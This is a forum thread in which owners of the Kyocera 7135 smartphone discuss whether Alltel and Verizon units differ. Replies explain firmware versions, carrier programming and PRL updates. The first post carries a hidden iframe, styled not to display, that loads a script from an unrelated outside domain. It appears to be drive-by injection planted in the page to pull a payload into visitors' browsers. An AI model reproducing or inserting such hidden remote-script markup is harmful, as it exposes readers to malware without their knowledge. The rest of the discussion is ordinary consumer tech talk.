+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

difference between Verizon and Alltel 7135's?

I am currently awaiting my 7135 with I guess Alltel software. On a previous post I read there was problems with it. What are teh differences between the 2. If it is software can it be updated??

Please talk in laymans terms as I am not familiar with some of the technical wording.

Marc<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No differnece, same software for everyone

MikeM wrote in a previous post:

I am indeed an independent retailer for Verizon Wireless, not a Verizon-owned corporate store. I work for a company called Celluar Sales of Virginia (we also have markets in KY, TN, NC, GA, and AL)... My understanding is that Verizon has approved the phone and that these phones have Verizon software loaded in them, though I will not be getting mine till tomorrow so I can't check right now (If I get it and it has Alltel software, I will send it back, angrily). My boss in Richmond is currently checking on it to make sure these are not Alltel models (I will be mad if they are!) but he believes that they are Verizon.

In the past, agents were the last to get new equipment, but that policy changed in February. Agents now are able to get new equipment at the time of release. Even before the corporate stores in some cases, it seems!
    Marc Chasin, MD

Software is the same for everyone, the phone just has to be programmed right. WHen it is programmed, it is loaded with Verizon settings (or whomever else).

what will I have to do when I receive it. When I call CS at verizon. Will I be able to get an updated software??

When I had my 7135 programed at Verizon, I asked about updated software when they finally release the 7135. The manager told me that they wont do software updates for at least a few months after the release. He said that since their phones will come with software they installed, there wont be any need for them to offer updates until the phones they distribute need updating. If at all, he said it would be at least several months before updates are available.

As stated before the software is the same for all carriers. The changes are the programming, PRL, and Carrier logos. If someone wanted to change an Alltel to Verizon (or any one else for that matter) all they would need is to program it and in some cases change the PRL. (Verizon will do that at programming via the air)

Jeeze, how many times could I say "SAME SOFTWARE"

Administrator
    as many times as you see postings in the rumors threads...

Originally posted by HoTSynC
    As many as people ask???

Oh, BTW, what's the difference between Verizon software and Alltel software?

OK, then riddle me this, Batman... what's the difference in the two versions that are currently out there:

MZ 1.0.30
    SZ 1.0.17

vs.

MZ 1.0.27
    SZ 1.0.13

Software is the same for everyone, the phone just has to be programmed right. WHen it is programmed, it is loaded with Verizon settings (or whomever else).
    HotSync,

I understand that that the software that is loaded onto the Verizon phones will be the same across the US and would need to be updated on the Alltel phones if you want all of the fixes/updates. What I am curious about is when you take your phone into Verizon to have such update done, the software that is loaded onto the ROM of the phone, like EIS browser, Voice Memo, and all other palm based apps that were pre-loaded into Rom, if those programs needed to be updated because of issues found through VZW and Kyocera updated their programs, would those programs also be updated in this kind of firmware update through the store or would they just update the network specific file that is currently an Alltel version?

The other question is: Can you explain what these stand for?

MZ 1.0.X
    SZ 1.0.X

what does the MZ and SZ stand for ?

I hope I made some sense and thank you for your response.

The letters that preceed the verison number are just Kyocera way of diferentiating software on all the different handsets they make.

MZ is the phone software
    SZ is the PDA software

The only differences that will be seen is improvments/fixes in the larger versions. Going to Verizon and upgrading to a more recent version won't change the handsets functionality or apperance. TO change those items, they will have to reprogram MANY items in the handset to set it to Verizon specific. Soem of the settings, the store will not be able to change however (network database).

The letters that preceed the verison number are just Kyocera way of diferentiating software on all the different handsets they make.

MZ is the phone software
    SZ is the PDA software

The only differences that will be seen is improvments/fixes in the larger versions. Going to Verizon and upgrading to a more recent version won't change the handsets functionality or apperance. TO change those items, they will have to reprogram MANY items in the handset to set it to Verizon specific. Soem of the settings, the store will not be able to change however (network database).

So that means when you take a Alltel phone to Verizon to update, it will still be different from an actual Verizon Release in regards to the software loaded? I'm not talking about hardware changes since that is NOT possible without changing the actual phone.

what is a example of a difference between alltel software and verizon software.

Administrator
    towers, roaming settings, connection methods, provisioning... things like that. those settings are carrier specific

I think part of the confusion may lie in the difference between "firmware" and "software". The firmware is the MZ and SZ numbers while the software would be the programs loaded onto the phone (e.g., date book, calculator, etc.). Hot Sync, tell me if I'm wrong, but I do believe that the Verizon phones may come with different firmware, but, as far as I know, with the exception of maybe one program, the loaded software will be the same. As far as the firmware goes, we all expect that we will be able to obtain the most recent firmware once Verizon releases the phone.

Now, I am waiting for a 7135 that was on alltel's network. Will verizon be able to update it when I activate it??
    Marc Chasin, MD

None. THe software is the same. When ALLTEL released, a certain version was available. When Verizon launches, newer software will be available that resolves some of the issues early adaptors are seeing.

You will see no physical differences.

When Verizon launches, newer software will be available that resolves some of the issues early adaptors are seeing.
    Only some?